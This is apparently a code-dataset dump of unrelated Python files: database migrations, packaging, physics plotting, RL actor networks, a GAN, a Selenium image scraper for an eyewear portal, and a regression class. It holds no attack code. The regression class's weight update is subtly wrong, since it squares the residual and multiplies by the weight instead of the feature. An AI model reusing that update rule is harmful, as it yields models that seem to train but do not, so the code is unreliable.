'305ace38cf61'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ntry:\n from config import DATABASE_URL\nexcept:\n from configdist import DATABASE_URL\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n if DATABASE_URL[:5] == 'mysql':\n op.alter_column('media', 'created_at', type_=mysql.DATETIME(fsp=6), nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n if DATABASE_URL[:5] == 'mysql':\n op.alter_column('media', 'created_at', type_=mysql.DATETIME(fsp=6), nullable=True)\n ### end Alembic commands ###\n","sub_path":"reactgur/migrations/versions/144649a54955_full_datetime.py","file_name":"144649a54955_full_datetime.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"152346558","text":"\"\"\"\nThis file contains the current state of packaging in Python using\nDistribution Utilities (Distutils) and its extension from the end\nuser'point-of-view.\n\nDocumentation:\nhttps://the-hitchhikers-guide-to-packaging.readthedocs.io/en/latest/introduction.html\n\"\"\"\n\nimport os\nimport re\nimport sys\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nPACKAGE = \"timst\"\n\n# Used for pytest and code coverage\nTESTS_REQUIEREMENTS = [\"pytest\", \"pytest-cov\"]\n# Depending on the documents more dependencies can be added\nDOCS_REQUIEREMENTS = [\"recommonmark\", \"sphinx_rtd_theme\", \"sphinxcontrib-bibtex\"]\n# Dependencies for the packages\nPACKAGE_REQUIEREMENTS = [\"numpy\", \"torch\", \"tqdm\", \"torchvision\"]\n\n# Read through Readme\ntry:\n this_directory = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\nexcept IOError:\n print(\"Read me file not found.\")\n\n\ndef get_version():\n \"\"\"Gets the version from the package's __init__ file\n if there is some problem, this fails.\n \"\"\"\n VERSIONFILE = os.path.join(\"src\", PACKAGE, \"__init__.py\")\n initfile_lines = open(VERSIONFILE, \"rt\").readlines()\n VSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\n for line in initfile_lines:\n mo = re.search(VSRE, line, re.M)\n if mo:\n return mo.group(1)\n\n\nsetup(\n name=PACKAGE,\n version=get_version(),\n description=\"Image style transfer using Torch\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Tanjona R. 
Rabemananjara\",\n author_email=\"tanjona.rabemananjara@mi.infn.it\",\n url=\"https://github.com/Radonirinaunimi/Style-Transfer\",\n install_requires=PACKAGE_REQUIEREMENTS,\n extras_require={\"docs\": DOCS_REQUIEREMENTS, \"tests\": TESTS_REQUIEREMENTS},\n entry_points={\"console_scripts\": [\"timst = timst.run:main\", ]},\n package_dir={\"\": \"src\"},\n packages=find_packages(\"src\"),\n package_data={\"\": [\"logo/logo.png\"], },\n classifiers=[\n \"Operating System :: Unix\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Physics\",\n ],\n setup_requires=[\"wheel\"],\n python_requires='>=3.6'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"59183828","text":"#!/usr/bin/env python3\n\nfrom scipp import array, DataArray, ones_like\nfrom argparse import ArgumentParser\nimport h5py, os\nimport matplotlib.pyplot as plt\n\n#nspertick = 11.356860963629653 # ESS clock is 88052500 Hz\n\n# Convert Ring and FEN to numbers or if not set, to 'A'\ndef id2chr(id):\n if id == -1:\n return 'any'\n else:\n return f'{id:02}'\n\ndef readtoscipp(filename):\n\n f = h5py.File(filename, 'r')\n dat = f['loki_readouts']\n\n #time = dat['EventTimeHigh'].astype('int')+dat['EventTimeLow'].astype('int')*nspertick/1000000000\n #time = array(values=time, dims=['event'], unit='sec')\n\n tube = array(values=dat['TubeId'].astype('int'), dims=['event'])\n ring = array(values=dat['RingId'].astype('int'), dims=['event'])\n fen = array(values=dat['FENId'].astype('int'), dims=['event'])\n\n ampl_a = array(values=1.0 * dat['AmpA'].astype('int'), dims=['event'], unit='mV')\n ampl_b = array(values=1.0 * dat['AmpB'].astype('int'), dims=['event'], unit='mV')\n ampl_c = array(values=1.0 * dat['AmpC'].astype('int'), dims=['event'], unit='mV')\n ampl_d = array(values=1.0 * dat['AmpD'].astype('int'), dims=['event'], unit='mV')\n\n events = ones_like(1. 
* tube)\n events.unit = 'counts'\n\n pos = (ampl_a + ampl_b) / (ampl_a + ampl_b + ampl_c + ampl_d)\n straw = (ampl_b + ampl_d) / (ampl_a + ampl_b + ampl_c + ampl_d)\n\n return DataArray(data=events,\n coords={'pos': pos, 'straw': straw, # 'time': time,\n 'tube': tube, 'ring': ring, 'fen': fen,\n 'amplitude_a': ampl_a, 'amplitude_b': ampl_b,\n 'amplitude_c': ampl_c, 'amplitude_d': ampl_d})\n\n\ndef load_and_save(args):\n dat = readtoscipp(args.filename)\n\n rgrp = array(dims=['ring'], values=[args.ring])\n fgrp = array(dims=['fen'], values=[args.fen])\n\n fig, ax = plt.subplots(4,2, figsize=(16,16))\n #fig.tight_layout()\n\n for i in range(args.tubes):\n print(f'processing ring {id2chr(args.ring)}, fen {id2chr(args.fen)}, tube {i}')\n tgrp = array(dims=['tube'], values=[i])\n if args.ring == -1 and args.fen == -1:\n grp = dat.group(tgrp).bins.concat()\n elif args.ring == -1 and args.fen != -1:\n grp = dat.group(fgrp, tgrp).bins.concat()\n elif args.ring != -1 and args.fen == -1:\n grp = dat.group(rgrp, tgrp).bins.concat()\n else:\n grp = dat.group(rgrp, fgrp, tgrp).bins.concat()\n\n yi = i // 2\n xi = i % 2\n cax = ax[yi, xi]\n grp.hist(pos=args.bin, straw=args.bin).plot(aspect=1.,norm='log', ax=cax)\n cax.title.set_text(f'Tube {i}')\n cax.set_xlim(args.xmin, args.xmax)\n cax.set_ylim(args.ymin, args.ymax)\n cax.yaxis.tick_left()\n cax.yaxis.set_label_position('left')\n if i <= 5:\n cax.set(xlabel='', ylabel='pos')\n else:\n cax.set(xlabel='straw', ylabel='pos')\n\n plt.suptitle(f'Ring: {id2chr(args.ring)}, FEN: {id2chr(args.fen)}, Tubes 0 - 8', size='28')\n plt.savefig(os.path.join(args.outdir, f'strawpos_{id2chr(args.ring)}_{id2chr(args.fen)}.png'))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(prog='dattoplot', description=__doc__)\n parser.add_argument('filename', type=str, nargs='?', default=\"\",\n help='.h5 file to load and plot')\n parser.add_argument('-o','--outdir', type=str, default=\"\",\n help='output directory')\n parser.add_argument('-r','--ring', type=int, default=-1, help='Ring Id (default all rings)')\n parser.add_argument('-f','--fen', type=int, default=-1, help='FEN Id (default all fens)')\n parser.add_argument('-t','--tubes', type=int, default=8, help='number of tubes')\n parser.add_argument('--xmin', type=float, default=0.0, help='min x-value')\n parser.add_argument('--xmax', type=float, default=1.0, help='max x-value')\n parser.add_argument('--ymin', type=float, default=0.0, help='min y-value')\n parser.add_argument('--ymax', type=float, default=1.0, help='max y-value')\n parser.add_argument('-b', '--bin', type=int, default=200, help='histogram bin size')\n\n args = parser.parse_args()\n\n load_and_save(args)\n","sub_path":"detectors/loki/h5tools/strawpos.py","file_name":"strawpos.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"459547345","text":"# Exercicio para praticar divisão inteira e resto da divisão.\n# author:milton lima\nentrada = int(input(\"Por favor, entre com o número de segundos que deseja converter:\"))\ndias = int(entrada//86400) \nsegundos = entrada % 86400\nhoras = int(segundos//3600)\nsegundos = segundos % 3600\nminutos = int(segundos//60)\nsegundos = segundos % 60\nprint(dias,\"dias,\",horas,\"horas,\",minutos,\"minutos e\",segundos,\"segundos.\")","sub_path":"segundos.py","file_name":"segundos.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"316572729","text":"import torch\nimport torch.nn as nn\nfrom functools import reduce\n\nfrom catalyst.contrib.models import SequentialNet\nfrom catalyst.dl.initialization import create_optimal_inner_init, outer_init\nfrom catalyst.rl.agents.utils import normal_sample, normal_log_prob\nfrom catalyst.rl.agents.layers import StateNet, SquashingLayer, CouplingLayer\n\n# log_sigma of Gaussian policy are capped at (LOG_SIG_MIN, LOG_SIG_MAX)\nLOG_SIG_MAX = 2\nLOG_SIG_MIN = -10\n\n\nclass Actor(StateNet):\n \"\"\"\n Actor which learns deterministic policy.\n \"\"\"\n\n @classmethod\n def create_from_config(\n cls,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n dropout=None,\n norm_fn=None,\n bias=True,\n layer_order=None,\n residual=False,\n out_activation=None,\n memory_type=None,\n **kwargs\n ):\n assert len(kwargs) == 0\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n if isinstance(state_shape, int):\n state_shape = (state_shape, )\n\n if len(state_shape) in [1, 2]:\n # linear case: one observation or several one\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n observation_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n dropout=dropout,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias,\n layer_order=layer_order,\n residual=residual\n )\n elif len(state_shape) in [3, 4]:\n # cnn case: one image or several one @TODO\n raise NotImplementedError\n else:\n raise NotImplementedError\n\n if memory_type == \"lama\":\n raise NotImplementedError\n elif memory_type == \"rnn\":\n raise NotImplementedError\n else:\n memory_net = None\n memory_out = hiddens[-1]\n\n head_net = SequentialNet(\n hiddens=[memory_out, action_size],\n layer_fn=nn.Linear,\n activation_fn=out_activation,\n norm_fn=None,\n bias=True\n )\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n observation_net.apply(inner_init)\n head_net.apply(outer_init)\n\n actor_net = cls(\n observation_net=observation_net,\n memory_net=memory_net,\n head_net=head_net\n )\n\n return actor_net\n\n\nclass GaussActor(nn.Module):\n \"\"\" Actor which learns mean and standard deviation of Gaussian\n stochastic policy. 
Actions obtained from the policy are squashed\n with (out_activation).\n \"\"\"\n\n def __init__(\n self,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n norm_fn=None,\n bias=True,\n out_activation=nn.Sigmoid\n ):\n super().__init__()\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n self.n_action = action_size\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n self.feature_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias\n )\n self.policy_net = SequentialNet(\n hiddens=[hiddens[-1], action_size * 2],\n layer_fn=nn.Linear,\n activation_fn=None,\n norm_fn=None,\n bias=bias\n )\n self.squasher = SquashingLayer(out_activation)\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n self.feature_net.apply(inner_init)\n self.policy_net.apply(outer_init)\n\n def forward(self, observation, with_log_pi=False):\n observation = observation.view(observation.shape[0], -1)\n x = observation\n x = self.feature_net.forward(x)\n x = self.policy_net.forward(x)\n\n mu, log_sigma = x[:, :self.n_action], x[:, self.n_action:]\n log_sigma = torch.clamp(log_sigma, LOG_SIG_MIN, LOG_SIG_MAX)\n sigma = torch.exp(log_sigma)\n z = normal_sample(mu, sigma)\n log_pi = normal_log_prob(mu, sigma, z)\n action, log_pi = self.squasher.forward(z, log_pi)\n\n if with_log_pi:\n return action, log_pi, mu, log_sigma\n return action\n\n\nclass RealNVPActor(nn.Module):\n \"\"\" Actor which learns policy based on Real NVP Bijector.\n Such policy transforms samples from N(z|0,I) into actions and\n then squashes them with (out activation).\n \"\"\"\n\n def __init__(\n self,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n norm_fn=None,\n bias=True,\n out_activation=nn.Sigmoid\n ):\n super().__init__()\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n self.n_action = action_size\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n self.feature_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias\n )\n self.embedding_net = SequentialNet(\n hiddens=[hiddens[-1], action_size * 2],\n layer_fn=layer_fn,\n activation_fn=None,\n norm_fn=norm_fn,\n bias=bias\n )\n\n self.coupling1 = CouplingLayer(\n action_size=action_size,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=None,\n bias=bias,\n parity=\"odd\"\n )\n self.coupling2 = CouplingLayer(\n action_size=action_size,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=None,\n bias=bias,\n parity=\"even\"\n )\n\n self.squasher = SquashingLayer(out_activation)\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n self.feature_net.apply(inner_init)\n self.embedding_net.apply(inner_init)\n\n def forward(self, observation, with_log_pi=False):\n observation = observation.view(observation.shape[0], -1)\n x = observation\n x = self.feature_net.forward(x)\n state_embedding = self.embedding_net.forward(x)\n\n mu = torch.zeros((observation.shape[0], self.n_action)).to(x.device)\n sigma = torch.ones_like(mu).to(x.device)\n z = 
normal_sample(mu, sigma)\n log_pi = normal_log_prob(mu, sigma, z)\n z, log_pi = self.coupling1.forward(z, state_embedding, log_pi)\n z, log_pi = self.coupling2.forward(z, state_embedding, log_pi)\n action, log_pi = self.squasher.forward(z, log_pi)\n\n if with_log_pi:\n return action, log_pi\n return action\n","sub_path":"rl/agents/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4904392","text":"import logging\n\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow.contrib import learn\nfrom tensorflow.contrib import layers\n\ndef generator(x, hidden_size):\n with tf.variable_scope('Generator'):\n h0 = tf.nn.softplus(layers.linear(x, hidden_size))\n return layers.linear(h0, 1)\n\n\ndef discriminator(x, hidden_size, scope='Discriminator', reuse=False):\n with tf.variable_scope(scope, reuse=reuse):\n h0 = tf.tanh(layers.linear(x, hidden_size * 2))\n h1 = tf.tanh(layers.linear(h0, hidden_size * 2))\n h2 = tf.tanh(layers.linear(h1, hidden_size * 2))\n return tf.sigmoid(layers.linear(h2, 1))\n\n\ndef gan_model(feature, unused_target):\n z = tf.random_uniform(tf.shape(feature), -1, 1, dtype=feature.dtype)\n z.set_shape(feature.get_shape())\n feature_generated = generator(z, 10)\n discr_true = discriminator(feature, 10)\n discr_generated = discriminator(feature_generated, 10, reuse=True)\n loss_discr = tf.reduce_mean(-tf.log(discr_true) - tf.log(1 - discr_generated))\n loss_generator = tf.reduce_mean(-tf.log(discr_generated))\n\n variables = tf.trainable_variables()\n generator_params = [v for v in variables if v.name.startswith('Generator/')]\n discriminator_params = [v for v in variables if v.name.startswith('Discriminator/')]\n gc = tf.contrib.framework.get_global_step()\n learning_rate = tf.train.exponential_decay(\n 0.005, gc, 150, 0.95, staircase=True)\n with tf.variable_scope('Discriminator'):\n discriminator_train_op = layers.optimize_loss(\n loss_discr, gc, variables=discriminator_params,\n learning_rate=learning_rate, optimizer='Adam', summaries=[])\n with tf.variable_scope('Generator'):\n generator_train_op = layers.optimize_loss(\n loss_generator, gc, variables=generator_params,\n learning_rate=learning_rate, optimizer='Adam', summaries=[])\n\n return (feature_generated, loss_discr + loss_generator,\n tf.group(discriminator_train_op, generator_train_op))\n\n\ndef main():\n tf.logging._logger.setLevel(logging.INFO)\n data = np.random.normal(4, 0.5, 10000).astype(np.float32)\n data.sort()\n est = learn.Estimator(model_fn=gan_model)\n est.fit(x=data, y=data, steps=10000, batch_size=32)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"gan/gan_intro.py","file_name":"gan_intro.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"483444712","text":"'''\nAutor: Marcos Felipe da Silva\nversão: 1.5\ndata: 18-11-2019\n------------------------------\nAcessar o site da luxottica, se autenticar, navegar nos menus, retirar imagens e sair\n------------------------------\nHistorico:\nv1.0 Acessa site da luxottica, autentica navega sobre os menus e extrai as imagens das armações\nv1.1 Agora com melhorias de erros, controla a gravação das imagens, reconhece imagens não encontradas\n e gera log dos links de imagens que foram obtidas como gifs\nv1.2 Acertado problema onde o script nao estava saltando para a proxima pagina dentro da grife.\nv1.3 Incluso o 
atendimento a uma execao quando for baixar imagem e tambem incluso o scrollTo para rolar abaixo na tela\nV1.4 Salva o local onde se encontra o fluxo de download para retomar do ponto onde parou.\nv1.5 Baixa imagens de tamanho maior para melhorar visualização das mesmas.\n'''\n\nfrom selenium.webdriver import ChromeOptions, Chrome\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport selenium.common.exceptions\nfrom bs4 import BeautifulSoup as bfs\nfrom urllib.request import urlretrieve\nfrom time import sleep\nfrom chave_api import chave\nimport re, os, urllib, pickle\n\n\nchrome_driver = '../chrome/chromedriver'\nurl = 'https://my.luxottica.com'\n## Opcoes do chrome\nopt = ChromeOptions()\nopt.add_argument('--headless')\n\ntempo = 2 # tempo de espera dos processos\n# Arquivo que contem o indice de onde a busca de armações parou\nARQUIVO_INDICE_GRIFES = 'grifes.pickle'\n#\n\ndados_salvos = {\n 'grife': 0,\n 'pag_atual':1 \n}\n# CARREGANDO O INDICE ATUAL (SE EXISTIR)\nif os.path.exists(ARQUIVO_INDICE_GRIFES):\n with open(ARQUIVO_INDICE_GRIFES, 'rb') as arq:\n dados_salvos = pickle.load(arq)\n\n\nclass Luxottica:\n\n def __init__(self, url, pag_atual):\n self._url = url\n self.__driver = Chrome(chrome_driver, options=opt)\n self.__driver.get(url)\n self._regex_grifes = {'data-analytics': re.compile('.*')}\n self._pag_atual = pag_atual # controla o indice atual da pagina\n self._grife_atual = None\n self._modelo_atual = None\n self._cor_atual = None\n \n sleep(2)\n \n def login(self):\n cpUser = self.__driver.find_element_by_name('logonId')\n cpPasswd = self.__driver.find_element_by_name('logonPassword')\n bt = self.__driver.find_element_by_xpath('//button[@type=\"submit\"]')\n # Envaindo usuario e senha\n cpUser.clear();cpUser.send_keys(chave['usuario'])\n #sleep(1)\n cpPasswd.clear();cpPasswd.send_keys(chave['senha'])\n #sleep(1)\n bt.click()\n sleep(1)\n self.selecao_grife()\n sleep(2)\n self.quit()\n return True\n \n def quit(self):\n self.__driver.quit()\n\n def selecao_grife(self):\n ''' Metodo seleciona a grife informada procurando por data-analytics'''\n # Recupere e exiba todas as grifes disponiveis\n bs = bfs(self.__driver.page_source, 'html5lib')\n # Obtem os links\n todas = bs.find('ul', {'class':'brand-element product toAnalytics'}).find_all('a', self._regex_grifes)\n for num, t in enumerate(todas[dados_salvos['grife']:], dados_salvos['grife']):\n # SALVANDO A POSICAO ATUAL QUE ESTOU\n with open(ARQUIVO_INDICE_GRIFES, 'wb') as arq:\n dados_salvos['grife'] = num\n pickle.dump(dados_salvos, arq)\n\n self.__driver.get(t['href'])\n sleep(tempo)\n while True: # Equanto tiver pagina para seguir adiante\n sleep(tempo) # temp\n pagina_atual = self.__driver.current_url\n self._grife_atual = t['data-analytics'].strip() # Pega o nome da grife atual\n # VER SE JA FOI CARREGADO\n try:\n element = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, 'a.current'))\n )\n bs = bfs(self.__driver.page_source, 'html5lib')\n finally:\n pag_atual = int(bs.find('a', {'class': 'current'}).get_text())\n # SE self._pag_atual FOR MAIOR QUE pag_atual VA AVANCANDO ATE A PAGINA QUE PRECISA ESTAR\n if self._pag_atual > pag_atual: # AVANCE UMA PAGINA\n self.__driver.find_element_by_xpath('//a[@data-analytics=\" NEXT\"]').click()\n continue\n\n\n\n print('PAGINA ATUAL %d' % int(pag_atual))\n # Selecione os 
modelos\n modelos = bs.find('section', {'class': 'product-grid'}).find('ul').find_all('div', {'class': 'wrap-link'})\n # passe cada mode para ter sua imagem extraida\n for md in modelos:\n self._modelo_atual = md.find('h3', {'class': 'model-code'})['data-analytics'].strip()\n href = md.find('a')['href']\n self.selecao_modelo(href)\n self._modelo_atual = None # zerando o modelo\n # acabou a pagina, passe para a outra (procure por data-analytics=\" NEXT\")\n nextLink = bs.find('a', {'data-analytics': \" NEXT\"})\n if nextLink:\n # RECUPERAR O OBJETO AGORA\n self.__driver.get(pagina_atual)\n sleep(tempo)\n elemento = None\n try: # Espere o icone do data-analytics aparecer\n elemento = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//a[@data-analytics=\" NEXT\"]'))\n )\n except selenium.common.exceptions.StaleElementReferenceException:\n print('NAO ENCONTRADO BOTAO PARA CLICK ')\n print(self.__driver.page_source)\n finally:\n if not elemento is None:\n self.__driver.find_element_by_xpath('//a[@data-analytics=\" NEXT\"]').click()\n self._pag_atual += 1\n # Salvar posicao atual da pagina\n self.salvar_dados()\n print('PASSANDO A PROXIMA PAGINA')\n else: # Chegamos ao fim. passando para a proxima familia\n print('FIM DA GRIFE ----------->')\n self._pag_atual = 1\n self.salvar_dados()\n break\n\n self._grife_atual = None # Zerando a grife\n\n def salvar_dados(self):\n ''' Salva a pagina atual e a grife que se encontra '''\n dados_salvos['pag_atual'] = self._pag_atual\n with open(ARQUIVO_INDICE_GRIFES, 'wb') as arq:\n pickle.dump(dados_salvos, arq)\n \n \n def selecao_modelo(self, modelo):\n ''' Metodo seleciona o modelo ORJ9052S e então passa as cores '''\n #\n self.__driver.get(modelo)\n sleep(tempo)\n # Da uma navegada na pagina para carregar ela por completo\n for i in range(1, 8):\n self.__driver.execute_script('window.scrollTo(0, %d);' % (i * 200))\n sleep(.5)\n \n bs = bfs(self.__driver.page_source, 'html5lib')\n #Se prosseguir com erro vamos tratar a exceção\"\n elemento = None\n try:\n elemento = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//table[@id=\"brand-products-info\"]'))\n )\n if not elemento is None: todos_itens = bs.find('table', {'id':'brand-products-info'}).find('tbody').find_all('tr')\n except selenium.common.exceptions.TimeoutException:\n pass\n finally:\n if elemento is None or not elemento:\n print(elemento) \n print('NÃO ENCONTROU CONJUNTO DE CORES')\n todos_itens = []\n \n for item in todos_itens:\n print(self._grife_atual, '_', self._modelo_atual, '_', item['data-color'])\n self._cor_atual = item['data-color'].strip().replace('/', '--')\n imagem = item.find('td', {'class':'first'}).find('img', {'class':'images lazy'})\n self.selecao_cor(self._url+imagem['src'])\n #sleep(tempo) não é necessário um tempo\n self._cor_atual = None # Zerando a cor\n\n def selecao_cor(self, cor):\n ''' FINALMENTE NA SELECAO DE COR CONSEGUE-SE BAIXAR a imagem desejada '''\n #NECESSARIO LIDAR COM IMAGENS QUE NAO EXISTAM urllib.error.HTTPError: HTTP Error 404: Not Found\n nome, ext = os.path.basename(cor).rsplit('.', 1)\n nome_arquivo = '_'.join([self._grife_atual, self._modelo_atual, self._cor_atual])+'.'+ext\n # Todos que são .gif devem ser armazenados no arquivo gifs.log\n if ext == 'gif':\n with open('gifs.log', 'a') as arq:\n arq.write('%s \\n' % (nome_arquivo))\n return False\n \n if not os.path.exists('imagens/'+nome_arquivo): # Se nao existe o arquivo vamos baixar\n try:\n urlretrieve(cor, 
'imagens/'+nome_arquivo)\n except urllib.error.HTTPError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('ARQUIVO NÃO ENCONTRADO: %s => %s \\n' % (nome_arquivo, cor))\n except urllib.error.URLError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('CONEXAO RESETADA: %s => %s ====> %s\\n' % (nome_arquivo, cor, str(err)))\n # VEJA SE O ARQUIVO DE RESOLUCAO MAIOR TAMBÉM NAO EXISTE, SE NÃO EXISTIR SALVE\n if not os.path.exists('imagens_maior/'+nome_arquivo): # Se nao existe o arquivo vamos baixar\n # troque 222x111 por 890x445\n novo_cor = cor.replace('222x111', '890x445')\n try:\n urlretrieve(novo_cor, 'imagens_maior/'+nome_arquivo)\n except urllib.error.HTTPError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('ARQUIVO NÃO ENCONTRADO: %s => %s \\n' % (nome_arquivo, novo_cor))\n except urllib.error.URLError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('CONEXAO RESETADA: %s => %s ====> %s\\n' % (nome_arquivo, novo_cor, str(err)))\n\n\nif __name__ == '__main__':\n # Instanciando a Luxottica e ativando o login\n l = Luxottica(url, dados_salvos['pag_atual'])\n l.login()\n\n\n","sub_path":"luxottica/luxottica.py","file_name":"luxottica.py","file_ext":"py","file_size_in_byte":10712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"542816820","text":"import random\r\nimport math\r\nimport pygame\r\nimport time\r\n\r\na = dir(random)\r\nb = dir(math)\r\nc = dir(pygame)\r\nd = dir(time)\r\n\r\nline = 0\r\nline1 = 0\r\nline2 = 0\r\nline3 = 0\r\nline4 = 0\r\nrandomMod = 61\r\nmathMod = 54\r\npygameMod = 334\r\ntimeMod = 25\r\n\r\nfor item in a:\r\n\r\n line += 1\r\n lin = str(line)\r\n print(lin + \".\" + item)\r\n\r\nfor item in b:\r\n\r\n line1 += 1\r\n lin1 = str(line1)\r\n print(lin1 + \".\" + item)\r\n\r\nfor item in c:\r\n\r\n line2 += 1\r\n lin2 = str(line2)\r\n print(lin2 + \".\" + item)\r\n\r\nfor item in d:\r\n\r\n line3 += 1\r\n lin3 = str(line3)\r\n print(lin3 + \".\" + item)\r\n","sub_path":"Newbie-Python/newbie-python-39.py","file_name":"newbie-python-39.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"378551937","text":"# This class contains the MultivariateRegression Functions\n# This class can be imported in jupyter and data can be plotted there\n\n\nclass MultivariateRegression():\n \"\"\"\n Initialise the class with X and Y of the training set. Y MUST be\n a one-dimensional array where as X can be of any shape. However,\n the number of elements in X and Y must be the same.\n Please remember to clean the dataset before initialisation. Otherwise,\n BLUNDERS appear for sure. 
This class DOES NOT handle cleaning.\n \"\"\"\n\n def __init__(self, X, Y, num_of_features, learning_rate=0.0005):\n if len(X) != len(Y):\n raise Exception(\"X and Y don't have same element count !!!\")\n elif len(X) <= 0 or len(Y) <= 0:\n raise Exception(\"X or Y is empty or invalid !!!\")\n self.X = X\n self.Y = Y\n self.num_of_features = num_of_features\n self.N = len(X)\n self.weights = [0.0] * self.num_of_features\n self.is_trained = False\n self.learning_rate = learning_rate\n self.cost_history = []\n\n def get_mse(self):\n # This function returns the MSE based on the weights\n mse = 0.0\n for i in range(self.N):\n mse += (self.Y[i] - self.product(self.weights, self.X[i])) ** 2\n return mse/self.N\n\n @staticmethod\n def product(X, Y):\n # This is static method that multipies two matrices and\n # returns the product value. It takes two 1-d Arrays of same length.\n sum = 0.0\n for x, y in zip(X, Y):\n sum += x * y\n return sum\n\n def update_weights(self):\n # This function updates the weights array using gradient descent\n weight_derivs = [0.0] * self.num_of_features\n for i in range(self.N):\n common_term = -2 * (self.Y[i] - self.product(self.X[i], self.weights)) ** 2\n for j in range(self.num_of_features):\n weight_derivs[j] += common_term * self.weights[j]\n for i in range(self.num_of_features):\n self.weights[i] -= (weight_derivs[i]/self.N) * self.learning_rate\n\n def train(self, debug=False, debugInterval=5, iterations=100, max_error=5):\n # This function calculates the weights required for the minimum MSE\n self.cost_history = []\n for i in range(iterations):\n self.update_weights()\n cost = self.get_mse()\n self.cost_history.append({\n \"weights\": self.weights,\n \"cost\": cost\n })\n if i % debugInterval == 0 and debug:\n print(f'cost {cost} iteration {i} weights {self.weights}')\n if cost < max_error:\n break\n self.is_trained = True\n\n def predict(self, X):\n # Returns a prediction based on the calculated weights\n if self.is_trained:\n return self.product(X, self.weights)\n raise Exception('Please train model before predicting !!!')\n","sub_path":"regreesion/multivariate_regression/MultivariateRegression.py","file_name":"MultivariateRegression.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"330832152","text":"from django.contrib.auth.models import User\nfrom friendship.models import Friend, FriendshipRequest\nfrom rest_framework import serializers\nfrom rest_framework.fields import CharField,IntegerField\n\n\nclass UserFriendsSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Friend\n fields = ('to_user_id',)\n\nclass FriendshipRequestsSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = FriendshipRequest\n fields = ('id', 'from_user_id')\n\nclass SendRequestSerializer(serializers.ModelSerializer):\n from_user_id=IntegerField()\n to_user_id=IntegerField()\n class 